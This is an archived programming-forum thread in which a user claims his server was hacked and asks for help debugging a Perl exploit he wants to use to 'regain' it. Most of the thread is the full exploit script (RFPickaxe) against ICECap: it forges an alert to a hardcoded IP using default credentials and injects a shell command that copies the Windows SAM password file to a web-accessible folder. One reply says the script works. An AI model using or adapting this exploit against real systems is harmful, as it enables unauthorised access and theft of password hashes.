Jump to content

Annoying Error

- - - - -
Started by lintwurm, Apr 15 2010 10:56 AM

This topic has been archived. This means that you cannot reply to this topic.
4 replies to this topic

#1
lintwurm
Posted 15 April 2010 - 10:56 AM

lintwurm

    Learning Programmer

  • Members
  • PipPipPip
  • 77 posts
Hello everyone,

Some background information ^_^
I have had a bit of a problem lately, someone hacked my website server and deleted my account and I can't log in >_< But this guy left a backdoor which I found with a port scanning tool. I want to exploit his own backdoor and regain my server...

The exploit I was going to use is written in Perl and it keeps giving me an error:"Can't find string terminator "EOT" anywhere before EOF at blackice-exploit.pl line 64."

here is the code...

    #!/usr/bin/perl

    #

    # RFPickaxe.pl - demo exploit for default ICECap login/alerts

    # Disclaimer: I do not provide technical support for my exploits!

    #

    # Sorry, this requires Unix, due to the `date` call

    

    $|=1;

    use Socket;

    

    ###############################################################

    

    # IP of ICECap system (assumes port 8082)

    

    $Target="137.215.98.30";

    

    # account info - uses default 'iceman' w/ no password

    

    $account="iceman";

    $httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

    

    #-------- attributes of the alert ----------

    

    $id="100005";

    $issue_name="Exploit";

    $sev="1";

    

    # spoof these

    

    $target="0.0.0.8";

    $target_dns="some.host.com";

    $det_ip="0.0.0.8";

    $det_nbn="SENSOR";

    $int_ip="255.255.255.255";

    $param="Pickaxe";

    

    # either fake the MAC, or use it to run commands via JET vulnerability

    

    #$det_mac="0000000000000";

    $det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".

	    "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";

    

    ##############################################################

    

    

    $inet=inet_aton($Target);

    

    $time=`date -u "+%Y-%m-%d %T"`;

    $time=~s/ /%20/g;

    $time=~s/:/%3a/g;

    

    #path is \program files\network ice\icecap\spatch\en

    

    $alert="accountName=$account&issueID=$id&issueName=$issue_name".

	    "&severity=$sev&targetNetAddress=$target&targetDNSName=".

	    "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".

	    "Name=$det_nbn&detectorMacAddress=$det_mac&".

	    "intruderNetAddress=$int_ip&detectorType=3&startTime=".

	    "$time�meter=$param\r\n";

    

    $len=length($alert);

    

    @DXX=();

    $send = << "EOT";

    POST / HTTP/1.0

    User-Agent: netice-alerter/1.0

    Host: $Target:8082

    Authorization: Basic $httpauth

    Content-Type: application/x-www-form-urlencoded

    Content-Length: $len

    EOT

#     print <<"END";

#     The snake is old, and his skin is cold.

#     END


    $send=~s/\n/\r\n/g;

    $send=$send.$alert;

    sendraw("$send");

    print @DXX;

    exit;

    sub sendraw

	{# raw network functions stay in here

	    my ($pstr)=@_;

	    $PROTO=getprotobyname('tcp')||0;

	    # AF_INET=2 SOCK_STREAM=1

	    eval

	    {

	    	alarm(30);

	    	if(!(socket(S,2,1,$PROTO))){ die("socket");}

	    	if(connect(S,pack "SnA4x8",2,8081,$inet)){

			    # multi-column perl coding...don't do as I do ;)

		    select(S); 	$|=1;

		    print $pstr;

		    @DXX=<S>;

		    select(STDOUT); close(S);

		    alarm(0); 	return;

		}

		else

		{

			die("not responding");

	    	}

	    	alarm(0);

	    };

 	    if ($@)

	    {

		if($@ =~ /timeout/)

		{

			die("Timed out!\n");

		}

	    }

	}

Thanks for your time... ^_^

#2
phpforfun
Posted 19 April 2010 - 11:17 PM

phpforfun

    Speaks fluent binary

  • Members
  • PipPipPipPipPipPipPipPip
  • 1,236 posts
I havent tried to run this or anything.. but do you realize, you pretty much just said...

"My server got hacked, this is how, here is the actual script used to hack it, but I cant get it to work, whatsup?"

You provided your real IP, and the real script used to hack your server... Anyone with perl5 and a couple necessary perl packages installed would just download that script, and execute it, and god knows what it does to your server.

Think...
Checkout my new forum! http://adminreference.com/

#3
lintwurm
Posted 20 April 2010 - 12:33 AM

lintwurm

    Learning Programmer

  • Members
  • PipPipPip
  • 77 posts
Actually what I meant is that this guy installed a backdoor, and I want to exploit his backdoor using this perl script... but it is not working because of the error named above...

#4
phpforfun
Posted 20 April 2010 - 08:09 AM

phpforfun

    Speaks fluent binary

  • Members
  • PipPipPipPipPipPipPipPip
  • 1,236 posts
Right, you provided a script that can be used to exploit it, admitted to an exploit, and provided your IP, :P

And.. it works just fine on my server
Checkout my new forum! http://adminreference.com/

#5
brcjacks
Posted 05 August 2010 - 10:04 AM

brcjacks

    Newbie

  • Members
  • Pip
  • 1 posts
I don't know but I like the lyrics from the Doors in the script. "The snake is old, and his skin is cold."
Back to Perl




  1. CODECALL Programming Forum
  2. Web Development Forum
  3. Perl
IPB skins by Skinbox